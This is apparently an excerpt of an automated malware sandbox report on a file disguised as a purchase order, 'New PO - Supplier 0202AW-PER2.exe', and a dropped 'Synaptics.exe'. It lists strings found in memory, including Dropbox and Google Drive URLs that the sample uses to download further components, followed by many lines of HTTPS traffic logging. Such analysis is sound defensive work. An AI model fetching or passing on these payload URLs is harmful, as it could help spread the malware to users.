                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/v
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/z
                                Source: Synaptics.exe, 00000002.00000002.4112858633.00000000098FE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.comuc?id=0BxsMXGfPIZfSVlVs
                                Source: Synaptics.exe, 00000002.00000002.4116345538.000000000AA7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4145980808.000000001011E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085545699.000000000551E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4084575598.0000000004B0E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4113081833.0000000009A3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4132103119.000000000E55E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4128377376.000000000D51E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4126342787.000000000CC5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4127555381.000000000D01E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144868005.000000000F35E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085432795.00000000053DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4121389267.000000000BC1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4145777488.000000000FE9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4114187295.0000000009DFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4145072649.000000000F5DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4133398079.000000000ECDE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4123116448.000000000C39E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4113465615.0000000009B7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4118010922.000000000AE3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144971701.000000000F49E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4117028153.000000000ACFE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.comuc?id=0BxsMXGfPIZfSVlVsOGlEVGxuVk&export=download
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl(
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                                Source: Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
